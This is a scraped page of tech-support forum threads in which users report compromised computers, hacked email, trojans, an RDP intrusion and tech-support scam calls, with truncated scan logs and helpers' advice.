C:\Program Files\Viewpoint\Common\ViewpointService.exe
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\ehome\e... Read more

More replies
Relevance 47.97%

Windows 7, Outlook 2013 and ESET Smart Security 7. This is the second computer with the issue below that we would like reviewed please.

The other day my hosting company shut down my email accounts, not sure which system did it, but my dad and sister were using our webmail and now email accounts starting sending thousands of emails. This is the only details that I have. This computer is approx 2-3 years old and runs great but it's my sisters so not sure if she's on Facebook or which sites may have done this. Please help by reviewing the files and see if there is anything trojans, malaware, etc that could have done this. We are afraid to use the systems as passwords are now compromised.

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 6:09:58 PM, on 4/21/2014
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.16521)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Secunia\PSI\psi_tray.exe
C:\Program Files (x86)\TechSmith\Snagit 10\Snagit32.exe
C:\Users\Mary\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\Common Files\Nikon\Monitor\NkMonitor.exe
C:\Program Files (x86)\ACT\Act for Windows\Act.Outlook.Service.exe
C:\Program Files (x86)\Brother\ControlCenter3\brccMCtl.exe
C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\TechSmith\Snagit 10\TSCHelp.exe
C:\Program Files (... Read more

Answer:emails & passwords have been compromised - Computer 2

Hi, I just wanted to reach out see if anyone could review this.
 

2 more replies
Relevance 47.97%

I had a World of Warcraft account that is accessed from my computer recently attacked by hackers. Since I also access a number of much more valuable accounts (banking, etc.) it rang a lot of alarm bells. I had been running Norton Antivirus, but apparently it didn't find anything. I'm totally sure I didn't fall prey to any sort of social engineering or phishing, so I'm trying to review my system to see what was installed. It does look like spyware made it onto the system at some point (note the Media Star 2 toolbar, which I didn't install myself, and took over IE), and I'm assuming a Keylogger or password sniffer made it onto the machine.

Since Norton didn't detect anything, I tried Kaspersky, and it did find some files that it identified as trojans. Those were removed, although it still isn't clear to me how the passwords were observed.

I've run HijackThis, and I'm hoping an expert can take a look and let me know if you notice anything I should still be concerned about.

==================================

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 12:10:54 PM, on 3/2/2011
Platform: Windows 7 (WinNT 6.00.3504)
MSIE: Internet Explorer v8.00 (8.00.7600.16722)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Hewlett-Packard\HP MAINSTREAM KEYBOARD\ModLEDKey.exe
C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe
C:\Program Files\Hewlett-Packard&#... Read more

Answer:HiJackThis - Recently Compromised Computer

Hello and welcome to Bleeping Computer We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here. If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far. Upon completing the steps below another staff member will review your topic an do their best to resolve your issues. If you have already posted a DDS log, please do so again, as your situation may have changed. Use the 'Add Reply' and add the new log to this thread. Thanks and again sorry for the delay. We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scr DDS.pifDouble click on the DDS icon, allow it to run. A small box will open, with an explaination about the tool. No input is needed, the scan is running. Notepad will open with the results. Follow the instructions that... Read more

2 more replies
Relevance 47.56%

Good Morning:

AVG alerted me last week that there were several trojan Horses in our computer, trojan Horse 16.BVN, I believe. It seemed to remove them, but they were found again by AVG over the next couple of days every time AVG ran its scan at startup, together with other viruses.
Then, it didn't find that particular trojan, but a different one: trojan SHeur2.CBKQ.

The IT person at my husband's job told him to get rid of AVG, and use Avast instead, saying it is a better program. So, we deleted AVG, installed Avast, which promptly found that same trojan. That was yesterday. Today, Avast didn't find any trojans, but I updated Malwarebytes, and it found a trojan in the registry keys. Here is the log:

Malwarebytes' Anti-Malware 1.42
Database version: 3444
Windows 5.1.2600 Service Pack 3
Internet Explorer 8.0.6001.18702

12/28/2009 11:47:48 AM
mbam-log-2009-12-28 (11-47-48).txt

Scan type: Quick Scan
Objects scanned: 109629
Time elapsed: 3 minute(s), 58 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 1
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\richtx64.exe (Trojan.Agent) -> Qu... Read more

More replies
Relevance 47.56%

My Hotmail account was hacked, and under 'recent activity' I saw successful logins using MY IP address and Exchange ActiveSync. (Would love to know what this means, how it's accomplished). After changing the password, I continued to see successful logins, until I created the 2-step verification process and a stronger password. Even now, on a daily basis I see Numerous attempts to log into my email: "incorrect password entered."
One of the logins listed a different IP address, which I was able to track down and I now have all the details regarding its user. Any advise on what to do with that info--who to report it to?
I use free versions of AVAST, Malwarebytes and now SUPERAntiSpyware. I am really concerned about the security of my system.
What can I do to ensure the safety of online banking or online purchases?
Is there a way to know if it's just my hotmail that was hacked or if there's someone/thing lurking in my PC? :confused
Your advice will be greatly appreciated!!
 

Answer:Compromised computer or just a hacked hotmail account?!

If you want us to check your system for malware, please do the following:

READ & RUN ME FIRST. Malware Removal Guide

You may also want to read this:

How to Protect yourself from malware!
 

3 more replies
Relevance 47.56%

This computer had had rdp access open to the Internet for some time and a bot recently cracked the Administrator password and successfully logged in. Rdp access was disabled about 12 hours after the first successful login, but I'm almost certain there are now new or pre-existing viruses on the computer, and a quick scan with Spybot Search & Destroy showed a suspected "system service that has been identified as a threat" with the displayed name "!!!!" and the registry key "hide_evr2".

Thank you in advance for your time and assistance!
.
DDS (Ver_2011-08-26.01) - NTFSx86
Internet Explorer: 7.0.5730.11
Run by Chaplain Dave at 18:18:42 on 2012-05-29
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.2046.1233 [GMT -7:00]
.
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
svchost.exe
C:\WINDOWS\system32\afasrv32.exe
C:\WINDOWS\system32\astsrv.exe
C:\Program Files\Carbonite\Carbonite Backup\carboniteservice.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\Program Files\Pervasive Software\PSQL\bin\w3dbsmgr.exe
C:\WINDOWS... Read more

Answer:Suspected Rootkit Installed, Computer Compromised through RDP

Sorry, I do not mean to bump this topic, but I don't seem to be able to edit my original post.

I have since run Spybot Search & Destroy and a full scan with Malwarebytes Anti-Malware and removed all threats detected by both scans. I then ran another Spybot scan in safe mode, which found no threats.

I will not have access to the Internet from June 3 through June 9, but despite my inevitable lack of response, I am still seeking assistance on this issue.

Thank you in advance!

14 more replies
Relevance 47.56%

I receive telephone calls, they tell me My Computer is sending data and they just happen to be able to stop it!!
They want me to send them money, they will go into my computer fix it for their fee $$$ !

1) How can I stop these pesky phone calls..?? They seem to know when I am on the computer!

2) How did they get my phone number!?

3) Is there a "Cookie" or some "Setting" I can change or remove to stop this Kidnapping/Ransom!!!
 

Answer:Phone Call telling me they KNOW my computer is compromised.

1) you cant ,they are usually overseas and difficult to block the calls - they have no idea if you have a PC
tell them next time you only have an ipad or apple mac - they hang up
i get a call probably every 6-12 weeks - and sometimes play along with them, for 40mins or more before they hang up - usually asking them all sorts of silly questions while acting concerned and trying to do everthing i can - or ask them to hold on while i turn on the pc - and just leave the phone

2) companies sell lists of phone numbers , also from the normal phone book , and given the type of people you are dealing with , probably by various illegal activities

3) no setting - Just a) Never let them on to the PC - and if you have - you need to post in the virus forum to get the remote access and any malware off the machine
 

2 more replies
Relevance 47.56%

I got a weird warning while playing a FB game tonight. It opened a new tab in Firefox & started playing an audio message telling me to call this number.  One message states:  WARNING:  Customer - Your browser and computer may be compromised by security threats.  Call 1-877-679-2144 now for IMMEDIATE assistance.  There's a web page behind that pop up message.  it's (malware alert dot org slash warning dot html).   How do we get this to stop?  Is it a virus?  I scanned with AVG & it didn't pick anything up.

Answer:Browser and Computer Compromised - Call 877-679-2144?

Sounds like there is something fishy going on in your system. Try checking your FireFox Add-Ons and Extensions and remove anything. You might also want to have a quick look at your Programs and Features to see if there is a Potentially Unwanted Program (PUP) installed on your computer. 

1 more replies
Relevance 47.56%

Lately I have been receiving calls telling me my computer has been compromised and is operating at less than 100%. Of course the caller, who is not a native English speaker, offers to guide me through what I need to do to fix it. They state they are calling
from Microsoft. What kind of scam is this?

More replies
Relevance 47.56%

please help!!! seems compromised, combofix says detected rootkit, cannot seem to fix up???

Answer:computer seems compromised, freezing, combofix says rootkit

Hi,Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log.Please subscribe to this topic, if you haven't already. You can subscribe by clicking the Options box to the right of your topic title and selecting Track This Topic.

Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.

Please reply to this post so I know you are there.The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic.Once I receive a reply then I will return with your first instructions.Thanks

21 more replies
Relevance 47.56%

Hi,

I ran across this forum when I was searching for info on pop up that give the following text:

Message from Local System to User on 3/30/2008 12:53 AM. CRITICAL ERROR MESSAGE!-REGISTRY DAMAGED AND CORRUPTED

To FIX this problem:
Open Internet Explorer and type: www.registrycleanerxp.com
Once you load the web page, close this message window

After you install the cleaner program you will not receive an more reminders or pop-ups like this.

VISIT www.registrycleanerxp.com IMMEDIATELY!

I have researched and I know it is a scam and probably some sort of malware, virus, etc., but I have done a lot. Nothing seems to stop it. The computer I have was given to me in 2004 and I finally got it running and realized it was infected. It crashes after multiple messages like this come up and eventually many strange redirections to websites will occur. I ran antivirus and anti-rootkit programs. I managed to destroy or quarantine many viruses, but there is still a problem because I am getting this pop up. I am exhausted and feel like destroying the computer. I was thinking of doing a trial of Trend Micro's product(s), because I don't want to get stuck with something I don't like at a high price. It hasn't done it yet, but my computer will probably eventually lock up and prevent me from using it at all.

Any ideas would be appreciated.

One last thing. When I ran the anti-virus program, it quarantine many virus or suspect files. I restarted my computer and g... Read more

Answer:Frusrated with compromised computer (Moved from Win2k)

I wish someone would recognize this and give some advice. I am thinking of trying some free software called RegCare to try to resolve this.

11 more replies